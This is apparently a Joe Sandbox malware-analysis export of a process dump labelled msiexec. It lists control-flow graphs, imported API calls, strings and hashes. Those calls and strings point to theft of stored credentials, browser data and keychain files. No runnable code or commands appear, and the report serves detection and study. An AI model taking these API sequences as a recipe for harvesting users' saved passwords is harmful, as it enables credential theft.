                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: InfoSystemmemset
                                                                                                            • String ID:
                                                                                                            • API String ID: 3558857096-0
                                                                                                            • Opcode ID: d0407614e71e7ae135e22cefa727abc0102cb379ef2ade91b8070469c4ed11d1
                                                                                                            • Instruction ID: bf8bfd662ffca2911032058da6995c9eeb4a28626cb6ee34ade21af96d3a2c90
                                                                                                            • Opcode Fuzzy Hash: d0407614e71e7ae135e22cefa727abc0102cb379ef2ade91b8070469c4ed11d1
                                                                                                            • Instruction Fuzzy Hash: C0E06531A0163097F22077766C067DF25949F41395F04407BB9049A186EBAC4D8546DE

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 0 44553b-445558 call 44db70 3 445599-4455a2 0->3 4 44555a-44557c call 40c768 call 40bdb0 call 4135f7 0->4 5 4455a8-4455e3 memset call 403988 wcsrchr 3->5 6 4457fb 3->6 42 44558e-445594 call 444b06 4->42 43 44557e-44558c call 4136c0 call 41366b 4->43 15 4455e5 5->15 16 4455e8-4455f9 5->16 10 445800-445809 6->10 13 445856-44585f 10->13 14 44580b-44581e call 40a889 call 403e2d 10->14 18 445861-445874 call 40a889 call 403c9c 13->18 19 4458ac-4458b5 13->19 45 445823-445826 14->45 15->16 21 445672-445683 call 40a889 call 403fbe 16->21 22 4455fb-445601 16->22 53 445879-44587c 18->53 23 44594f-445958 19->23 24 4458bb-44592b memset * 2 call 414c2e call 40b2cc call 409d1f call 409b98 19->24 87 445685 21->87 88 4456b2-4456b5 call 40b1ab 21->88 30 445605-445607 22->30 31 445603 22->31 28 4459f2-4459fa 23->28 29 44595e-4459ce memset * 2 call 414c2e call 40b2cc call 409d1f call 409b98 23->29 139 44592d-445945 call 40b6ef 24->139 140 44594a 24->140 37 445a00-445aa1 memset * 2 call 414c2e call 40b2cc call 409d1f call 40b2cc call 40ae18 28->37 38 445b29-445b32 28->38 157 4459d0-4459e8 call 40b6ef 29->157 158 4459ed 29->158 30->21 41 445609-44560d 30->41 31->30 182 445b08-445b15 call 40ae51 37->182 54 445c7c-445c85 38->54 55 445b38-445b96 memset * 3 38->55 41->21 51 44560f-445641 call 4087b3 call 40a889 call 4454bf 41->51 42->3 43->42 56 44584c-445854 call 40b1ab 45->56 57 445828 45->57 154 445665-445670 call 40b1ab 51->154 155 445643-445663 call 40a9b5 call 4087b3 51->155 67 4458a2-4458aa call 40b1ab 53->67 68 44587e 53->68 63 445d1c-445d25 54->63 64 445c8b-445cf3 memset * 2 call 414c2e call 409d1f call 409b98 54->64 69 445bd4-445c72 call 414c2e call 40b2cc call 409d1f call 445389 call 40b2cc call 409d1f call 445389 call 40b2cc call 409d1f call 445389 55->69 70 445b98-445ba0 55->70 56->13 71 44582e-445847 call 40a9b5 call 4087b3 57->71 76 445fae-445fb2 63->76 77 445d2b-445d3b 63->77 159 445cf5 64->159 160 445cfc-445d03 64->160 67->19 85 445884-44589d call 40a9b5 call 4087b3 68->85 249 445c77 69->249 70->69 86 445ba2-445bcf call 4099c6 call 445403 call 445389 70->86 142 445849 71->142 94 445d3d-445d65 call 409c52 call 40b2cc _wcsicmp 77->94 95 445d88-445e15 memset * 3 call 414c2e call 40b2cc call 409d1f call 409b98 77->95 146 44589f 85->146 86->54 89 44568b-4456a4 call 40a9b5 call 4087b3 87->89 107 4456ba-4456c4 88->107 148 4456a9-4456b0 89->148 165 445d67-445d6c 94->165 166 445d71-445d83 call 445093 94->166 196 445e17 95->196 197 445e1e-445e25 95->197 121 4457f9 107->121 122 4456ca-4456d3 call 413cfa call 413d4c 107->122 121->6 174 4456d8-4456f7 call 40b2cc call 413fa6 122->174 139->140 140->23 142->56 146->67 148->88 148->89 154->107 155->154 157->158 158->28 159->160 171 445d05-445d13 160->171 172 445d17 160->172 176 445fa1-445fa9 call 40b6ef 165->176 166->76 171->172 172->63 206 4456fd-445796 memset * 4 call 409c70 * 3 174->206 207 4457ea-4457f7 call 413d29 174->207 176->76 200 445b17-445b27 call 40aebe 182->200 201 445aa3-445ab0 call 40add4 182->201 196->197 202 445e27-445e59 call 40b2cc call 409d1f call 409b98 197->202 203 445e6b-445e7e call 445093 197->203 200->38 201->182 221 445ab2-445b03 memset call 40b2cc call 409d1f call 445389 201->221 239 445e62-445e69 202->239 240 445e5b 202->240 220 445f67-445f99 call 40b2cc call 409d1f call 409b98 203->220 206->207 248 445798-4457ca call 40b2cc call 409d1f call 409b98 206->248 207->10 220->76 253 445f9b 220->253 221->182 239->203 245 445e83-445ef5 memset call 40b2cc call 409d1f call 40ae18 239->245 240->239 264 445f4d-445f5a call 40ae51 245->264 248->207 265 4457cc-4457e5 call 4087b3 248->265 249->54 253->176 269 445ef7-445f04 call 40add4 264->269 270 445f5c-445f62 call 40aebe 264->270 265->207 269->264 274 445f06-445f38 call 40b2cc call 409d1f call 409b98 269->274 270->220 274->264 281 445f3a-445f48 call 445093 274->281 281->264
                                                                                                            APIs
                                                                                                            • memset.MSVCRT ref: 004455C2
                                                                                                            • wcsrchr.MSVCRT ref: 004455DA
                                                                                                            • memset.MSVCRT ref: 0044570D
                                                                                                            • memset.MSVCRT ref: 00445725
                                                                                                              • Part of subcall function 0040C768: _wcslwr.MSVCRT ref: 0040C817
                                                                                                              • Part of subcall function 0040C768: wcslen.MSVCRT ref: 0040C82C
                                                                                                              • Part of subcall function 0040BDB0: CredEnumerateW.ADVAPI32(00000000,00000000,?,?,?,00000000,?), ref: 0040BDE9
                                                                                                              • Part of subcall function 0040BDB0: wcslen.MSVCRT ref: 0040BE06
                                                                                                              • Part of subcall function 0040BDB0: wcsncmp.MSVCRT ref: 0040BE38
                                                                                                              • Part of subcall function 0040BDB0: memset.MSVCRT ref: 0040BE91
                                                                                                              • Part of subcall function 0040BDB0: memcpy.MSVCRT(?,?,?,00000001,?,?,?,00000000,?), ref: 0040BEB2
                                                                                                              • Part of subcall function 004135F7: GetProcAddress.KERNEL32(?,00000000), ref: 0041362A
                                                                                                            • memset.MSVCRT ref: 0044573D
                                                                                                            • memset.MSVCRT ref: 00445755
                                                                                                            • memset.MSVCRT ref: 004458CB
                                                                                                            • memset.MSVCRT ref: 004458E3
                                                                                                            • memset.MSVCRT ref: 0044596E
                                                                                                            • memset.MSVCRT ref: 00445A10
                                                                                                            • memset.MSVCRT ref: 00445A28
                                                                                                            • memset.MSVCRT ref: 00445AC6
                                                                                                              • Part of subcall function 00445093: GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
                                                                                                              • Part of subcall function 00445093: ??2@YAPAXI@Z.MSVCRT(0000000A,?,?,00000104), ref: 004450BE
                                                                                                              • Part of subcall function 00445093: memset.MSVCRT ref: 004450CD
                                                                                                              • Part of subcall function 00445093: ??3@YAXPAX@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,00000104), ref: 004450F0
                                                                                                              • Part of subcall function 00445093: CloseHandle.KERNEL32(00000000,?,?,00000104), ref: 004450F7
                                                                                                            • memset.MSVCRT ref: 00445B52
                                                                                                            • memset.MSVCRT ref: 00445B6A
                                                                                                            • memset.MSVCRT ref: 00445C9B
                                                                                                            • memset.MSVCRT ref: 00445CB3
                                                                                                            • _wcsicmp.MSVCRT ref: 00445D56
                                                                                                            • memset.MSVCRT ref: 00445B82
                                                                                                              • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
                                                                                                              • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
                                                                                                              • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
                                                                                                              • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
                                                                                                              • Part of subcall function 0040B6EF: CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                                                                              • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040ADF3
                                                                                                              • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040AE04
                                                                                                            • memset.MSVCRT ref: 00445986
                                                                                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                              • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                              • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                              • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.2744281798.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: memset$wcslen$File$wcscmpwcsrchr$??2@??3@AddressAttributesCloseCreateCredEnumerateHandleProcSize_wcsicmp_wcslwrmemcpywcscatwcscpywcsncmp
                                                                                                            • String ID: *.*$Apple Computer\Preferences\keychain.plist
                                                                                                            • API String ID: 2263259095-3798722523
                                                                                                            • Opcode ID: 60142fc224ce82f33f024026baff3817031bc91c0ca8ee6e0e9eeeaa230f4715
                                                                                                            • Instruction ID: 0d822d17a5609fa1e1b699618fc72e24fb48bc28b5d87ede4d5502c71e25afa2
                                                                                                            • Opcode Fuzzy Hash: 60142fc224ce82f33f024026baff3817031bc91c0ca8ee6e0e9eeeaa230f4715
                                                                                                            • Instruction Fuzzy Hash: ED4278B29005196BEB10E761DD46EDFB37CEF45358F1001ABF508A2193EB385E948B9A

                                                                                                            Control-flow Graph

                                                                                                            APIs
                                                                                                              • Part of subcall function 004044A4: LoadLibraryW.KERNEL32(comctl32.dll), ref: 004044C3
                                                                                                              • Part of subcall function 004044A4: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 004044D5
                                                                                                              • Part of subcall function 004044A4: FreeLibrary.KERNEL32(00000000), ref: 004044E9
                                                                                                              • Part of subcall function 004044A4: MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
                                                                                                            • SetErrorMode.KERNELBASE(00008001), ref: 00412799
                                                                                                            • GetModuleHandleW.KERNEL32(00000000,0041493C,00000000), ref: 004127B2
                                                                                                            • EnumResourceTypesW.KERNEL32(00000000), ref: 004127B9
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.2744281798.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Library$AddressEnumErrorFreeHandleLoadMessageModeModuleProcResourceTypes
                                                                                                            • String ID: $/deleteregkey$/savelangfile
                                                                                                            • API String ID: 2744995895-28296030
                                                                                                            • Opcode ID: 72338f9f39f0fed86814d702f01b1d2779e3084bd08ead6f54537fd18a2fe269
                                                                                                            • Instruction ID: bb1d383b9f388563dc7403a66819e695bb2bbb53a4e653fbe84b6d7681309d95
                                                                                                            • Opcode Fuzzy Hash: 72338f9f39f0fed86814d702f01b1d2779e3084bd08ead6f54537fd18a2fe269
                                                                                                            • Instruction Fuzzy Hash: FC51BEB1608346ABD710AFA6DD88A9F77ECFF81304F40092EF644D2161D778E8558B2A

                                                                                                            Control-flow Graph

                                                                                                            APIs
                                                                                                            • memset.MSVCRT ref: 0040B71C
                                                                                                              • Part of subcall function 00409C70: wcscpy.MSVCRT ref: 00409C75
                                                                                                              • Part of subcall function 00409C70: wcsrchr.MSVCRT ref: 00409C7D
                                                                                                            • wcsrchr.MSVCRT ref: 0040B738
                                                                                                            • memset.MSVCRT ref: 0040B756
                                                                                                            • memset.MSVCRT ref: 0040B7F5
                                                                                                            • CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                                                                            • CloseHandle.KERNELBASE(00000000,?,?), ref: 0040B838
                                                                                                            • memset.MSVCRT ref: 0040B851
                                                                                                            • memset.MSVCRT ref: 0040B8CA
                                                                                                            • memcmp.MSVCRT(?,v10,00000003), ref: 0040B9BF
                                                                                                              • Part of subcall function 00404423: GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                                                                                              • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                                                                            • memset.MSVCRT ref: 0040BB53
                                                                                                            • memcpy.MSVCRT(?,00000000,?,00000000,00000000,?), ref: 0040BB66
                                                                                                            • LocalFree.KERNEL32(00000000,?,?,?,00000000,00000000,?), ref: 0040BB8D
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.2744281798.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: memset$Freewcsrchr$AddressCloseCreateFileHandleLibraryLocalProcmemcmpmemcpywcscpy
                                                                                                            • String ID: chp$v10
                                                                                                            • API String ID: 4290143792-2783969131
                                                                                                            • Opcode ID: 839bcc7a1f039774e5e305ad4abdf0afa3b9ecc36c1b8e950fbf6c4f6c4bf1cf
                                                                                                            • Instruction ID: 8b5aa87907ec6e815121f1c024adfc7170cbdef62e19f7af032d1a0a82a34a86
                                                                                                            • Opcode Fuzzy Hash: 839bcc7a1f039774e5e305ad4abdf0afa3b9ecc36c1b8e950fbf6c4f6c4bf1cf
                                                                                                            • Instruction Fuzzy Hash: 32D17372900218AFEB11EB95DC41EEE77B8EF44304F1044BAF509B7191DB789F858B99

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 505 40e2ab-40e2ce call 40695d call 406b90 509 40e2d3-40e2d5 505->509 510 40e4a0-40e4af call 4069a3 509->510 511 40e2db-40e300 509->511 512 40e304-40e316 call 406e8f 511->512 517 40e476-40e483 call 406b53 512->517 518 40e31c-40e39b call 40dd50 * 7 memset call 40aa29 512->518 524 40e302 517->524 525 40e489-40e495 call 40aa04 517->525 542 40e3c9-40e3ce 518->542 543 40e39d-40e3ae call 40742e 518->543 524->512 525->510 530 40e497-40e49f free 525->530 530->510 545 40e3d0-40e3d6 542->545 546 40e3d9-40e3de 542->546 552 40e3b0 543->552 553 40e3b3-40e3c1 wcschr 543->553 545->546 548 40e3e0-40e3f1 memcpy 546->548 549 40e3f4-40e3f9 546->549 548->549 550 40e3fb-40e40c memcpy 549->550 551 40e40f-40e414 549->551 550->551 554 40e416-40e427 memcpy 551->554 555 40e42a-40e42f 551->555 552->553 553->542 556 40e3c3-40e3c6 553->556 554->555 557 40e431-40e442 memcpy 555->557 558 40e445-40e44a 555->558 556->542 557->558 559 40e44c-40e45b 558->559 560 40e45e-40e463 558->560 559->560 560->517 561 40e465-40e469 560->561 561->517 562 40e46b-40e473 561->562 562->517
                                                                                                            APIs
                                                                                                              • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
                                                                                                              • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
                                                                                                            • free.MSVCRT ref: 0040E49A
                                                                                                              • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
                                                                                                            • memset.MSVCRT ref: 0040E380
                                                                                                              • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
                                                                                                              • Part of subcall function 0040AA29: memcpy.MSVCRT(?,?,00000000,00000001,00401B3C,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040AA5B
                                                                                                            • wcschr.MSVCRT ref: 0040E3B8
                                                                                                            • memcpy.MSVCRT(?,-00000121,00000008,0044E518,00000000,00000000,76232EE0), ref: 0040E3EC
                                                                                                            • memcpy.MSVCRT(?,-00000121,00000008,0044E518,00000000,00000000,76232EE0), ref: 0040E407
                                                                                                            • memcpy.MSVCRT(?,-00000220,00000008,0044E518,00000000,00000000,76232EE0), ref: 0040E422
                                                                                                            • memcpy.MSVCRT(?,-00000220,00000008,0044E518,00000000,00000000,76232EE0), ref: 0040E43D
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.2744281798.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: memcpy$_wcsicmpmemset$freewcschrwcslen
                                                                                                            • String ID: $AccessCount$AccessedTime$CreationTime$EntryID$ExpiryTime$ModifiedTime$Url
                                                                                                            • API String ID: 3849927982-2252543386
                                                                                                            • Opcode ID: 4fb386ce9209b8875289dcc542ef71d6c34f1816ca3767685257c05f3f5c3b96
                                                                                                            • Instruction ID: 3bb3cf654da2d90f893253d259683e8481abe175d229eeda5eb464894a91a1db
                                                                                                            • Opcode Fuzzy Hash: 4fb386ce9209b8875289dcc542ef71d6c34f1816ca3767685257c05f3f5c3b96
                                                                                                            • Instruction Fuzzy Hash: DA512071E00309ABDF10EFA6DC45B9EB7B8AF54305F15443BA904F7291E678AA14CB58

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 563 4091b8-40921b memset call 40a6e6 call 444432 568 409520-409526 563->568 569 409221-40923b call 40b273 call 438552 563->569 573 409240-409248 569->573 574 409383-4093ab call 40b273 call 438552 573->574 575 40924e-409258 call 4251c4 573->575 587 4093b1 574->587 588 4094ff-40950b call 443d90 574->588 580 40937b-40937e call 424f26 575->580 581 40925e-409291 call 4253cf * 2 call 4253af * 2 575->581 580->574 581->580 611 409297-409299 581->611 589 4093d3-4093dd call 4251c4 587->589 588->568 597 40950d-409511 588->597 598 4093b3-4093cc call 4253cf * 2 589->598 599 4093df 589->599 597->568 601 409513-40951d call 408f2f 597->601 598->589 615 4093ce-4093d1 598->615 603 4094f7-4094fa call 424f26 599->603 601->568 603->588 611->580 613 40929f-4092a3 611->613 613->580 614 4092a9-4092ba 613->614 616 4092bc 614->616 617 4092be-4092e3 memcpy memcmp 614->617 615->589 618 4093e4-4093fb call 4253af * 2 615->618 616->617 619 409333-409345 memcmp 617->619 620 4092e5-4092ec 617->620 618->603 628 409401-409403 618->628 619->580 623 409347-40935f memcpy 619->623 620->580 622 4092f2-409331 memcpy * 2 620->622 625 409363-409378 memcpy 622->625 623->625 625->580 628->603 629 409409-40941b memcmp 628->629 629->603 630 409421-409433 memcmp 629->630 631 4094a4-4094b6 memcmp 630->631 632 409435-40943c 630->632 631->603 634 4094b8-4094ed memcpy * 2 631->634 632->603 633 409442-4094a2 memcpy * 3 632->633 635 4094f4 633->635 634->635 635->603
                                                                                                            APIs
                                                                                                            • memset.MSVCRT ref: 004091E2
                                                                                                              • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                                                                            • memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,00000143,00000000), ref: 004092C9
                                                                                                            • memcmp.MSVCRT(00000000,0045A4F0,00000006,?,?,?,?,?,?,?,?,?,?,?,?,00000143), ref: 004092D9
                                                                                                            • memcpy.MSVCRT(?,00000023,?), ref: 0040930C
                                                                                                            • memcpy.MSVCRT(?,?,00000010), ref: 00409325
                                                                                                            • memcmp.MSVCRT(00000000,0045A4E8,00000006), ref: 0040933B
                                                                                                            • memcpy.MSVCRT(?,00000015,?), ref: 00409357
                                                                                                            • memcpy.MSVCRT(?,?,00000010), ref: 00409370
                                                                                                            • memcmp.MSVCRT(00000000,004599B8,00000010), ref: 00409411
                                                                                                            • memcmp.MSVCRT(00000000,0045A500,00000006), ref: 00409429
                                                                                                            • memcpy.MSVCRT(?,00000023,?), ref: 00409462
                                                                                                            • memcpy.MSVCRT(?,?,00000010), ref: 0040947E
                                                                                                            • memcpy.MSVCRT(?,?,00000020), ref: 0040949A
                                                                                                            • memcmp.MSVCRT(00000000,0045A4F8,00000006), ref: 004094AC
                                                                                                            • memcpy.MSVCRT(?,00000015,?), ref: 004094D0
                                                                                                            • memcpy.MSVCRT(?,?,00000020), ref: 004094E8
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.2744281798.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: memcpy$memcmp$ByteCharMultiWidememset
                                                                                                            • String ID:
                                                                                                            • API String ID: 3715365532-3916222277
                                                                                                            • Opcode ID: a80c2ed2cd7725c5ba05b8bc3cd527f2b50e73a4ba521d2eda8c640b4e065994
                                                                                                            • Instruction ID: d5c0d9b4f94ac501fd0f2fb5594fd033b2d13f4c98b4255323c8c53c7695c3f7
                                                                                                            • Opcode Fuzzy Hash: a80c2ed2cd7725c5ba05b8bc3cd527f2b50e73a4ba521d2eda8c640b4e065994
                                                                                                            • Instruction Fuzzy Hash: DDA1BA71900605ABDB21EF65D885BAFB7BCAF44304F01043FF945E6282EB78EA458B59

                                                                                                            Control-flow Graph

                                                                                                            APIs
                                                                                                              • Part of subcall function 0040DD85: memset.MSVCRT ref: 0040DDAD
                                                                                                              • Part of subcall function 0040DD85: CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4
                                                                                                              • Part of subcall function 0040DD85: NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
                                                                                                              • Part of subcall function 0040DD85: CloseHandle.KERNELBASE(C0000004,?,000000FF,00000000,00000104), ref: 0040DE3E
                                                                                                              • Part of subcall function 0040DD85: GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
                                                                                                              • Part of subcall function 0040DD85: _wcsicmp.MSVCRT ref: 0040DEB2
                                                                                                              • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000001,00000001,00401E7F), ref: 0040AFD8
                                                                                                            • OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
                                                                                                            • GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
                                                                                                            • DuplicateHandle.KERNELBASE(?,00000104,00000000), ref: 0040E0BF
                                                                                                            • GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
                                                                                                              • Part of subcall function 00409A45: GetTempPathW.KERNEL32(00000104,?,00445FAE), ref: 00409A5C
                                                                                                              • Part of subcall function 00409A45: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                                                                                              • Part of subcall function 00409A45: GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
                                                                                                              • Part of subcall function 004096DC: CreateFileW.KERNELBASE(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                                                                                                            • CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
                                                                                                            • MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
                                                                                                            • WriteFile.KERNELBASE(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
                                                                                                            • UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
                                                                                                            • CloseHandle.KERNELBASE(?), ref: 0040E13E
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 0040E143
                                                                                                            • CloseHandle.KERNEL32(?), ref: 0040E148
                                                                                                            • CloseHandle.KERNEL32(?), ref: 0040E14D
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.2744281798.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: File$Handle$Close$CreateProcess$CurrentTempView$??2@DirectoryDuplicateInformationMappingNameOpenPathQuerySizeSystemUnmapWindowsWrite_wcsicmpmemset
                                                                                                            • String ID: bhv
                                                                                                            • API String ID: 4234240956-2689659898
                                                                                                            • Opcode ID: c96677cf1f2b88af9f6f98c954d74ea01aac065ab95576d822b7ccb478d5ef78
                                                                                                            • Instruction ID: 69536691d8562172d0558c987aea6dfe4ed17d6a9a6de0cf2c6621a9a97a0e87
                                                                                                            • Opcode Fuzzy Hash: c96677cf1f2b88af9f6f98c954d74ea01aac065ab95576d822b7ccb478d5ef78
                                                                                                            • Instruction Fuzzy Hash: 15412775800218FBCF119FA6CC489DFBFB9FF09750F148466F504A6250D7748A50CBA8

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 692 413f4f-413f52 693 413fa5 692->693 694 413f54-413f5a call 40a804 692->694 696 413f5f-413fa4 GetProcAddress * 5 694->696 696->693
                                                                                                            APIs
                                                                                                              • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                              • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                                              • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                              • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                              • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                                              • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                                            • GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00413F6F
                                                                                                            • GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 00413F7B
                                                                                                            • GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00413F87
                                                                                                            • GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00413F93
                                                                                                            • GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00413F9F
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.2744281798.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AddressProc$LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                                                                            • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                                                                                                            • API String ID: 2941347001-70141382
                                                                                                            • Opcode ID: f3462473bc82ea1c51451d3a028beeb45a1422339b7559a3bc587941b48753d6
                                                                                                            • Instruction ID: 7b3d606b7d389a8205b465373562f67d85acf78e859b2fe1c5436fc88fb80995
                                                                                                            • Opcode Fuzzy Hash: f3462473bc82ea1c51451d3a028beeb45a1422339b7559a3bc587941b48753d6
                                                                                                            • Instruction Fuzzy Hash: BBF03470840340AECB706F769809E06BEF0EFD8B097318C2EE6C557291E3BD9098DE48

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 697 4466f4-44670e call 446904 GetModuleHandleA 700 446710-44671b 697->700 701 44672f-446732 697->701 700->701 702 44671d-446726 700->702 703 44675b-4467aa __set_app_type __p__fmode __p__commode call 4153f2 701->703 705 446747-44674b 702->705 706 446728-44672d 702->706 710 4467ac-4467b7 __setusermatherr 703->710 711 4467b8-44680e call 4468f0 _initterm __wgetmainargs _initterm 703->711 705->701 709 44674d-44674f 705->709 706->701 708 446734-44673b 706->708 708->701 712 44673d-446745 708->712 713 446755-446758 709->713 710->711 716 446810-446819 711->716 717 44681e-446825 711->717 712->713 713->703 718 4468d8-4468dd call 44693d 716->718 719 446827-446832 717->719 720 44686c-446870 717->720 723 446834-446838 719->723 724 44683a-44683e 719->724 721 446845-44684b 720->721 722 446872-446877 720->722 728 446853-446864 GetStartupInfoW 721->728 729 44684d-446851 721->729 722->720 723->719 723->724 724->721 726 446840-446842 724->726 726->721 730 446866-44686a 728->730 731 446879-44687b 728->731 729->726 729->728 732 44687c-446894 GetModuleHandleA call 41276d 730->732 731->732 735 446896-446897 exit 732->735 736 44689d-4468d6 _cexit 732->736 735->736 736->718
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.2744281798.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: HandleModule_initterm$InfoStartup__p__commode__p__fmode__set_app_type__setusermatherr__wgetmainargs_cexitexit
                                                                                                            • String ID:
                                                                                                            • API String ID: 2827331108-0
                                                                                                            • Opcode ID: 7ba7b2652c13871cd0d5cae79e0f4a701fe2602556b2c3d333f15f3a91922bbb
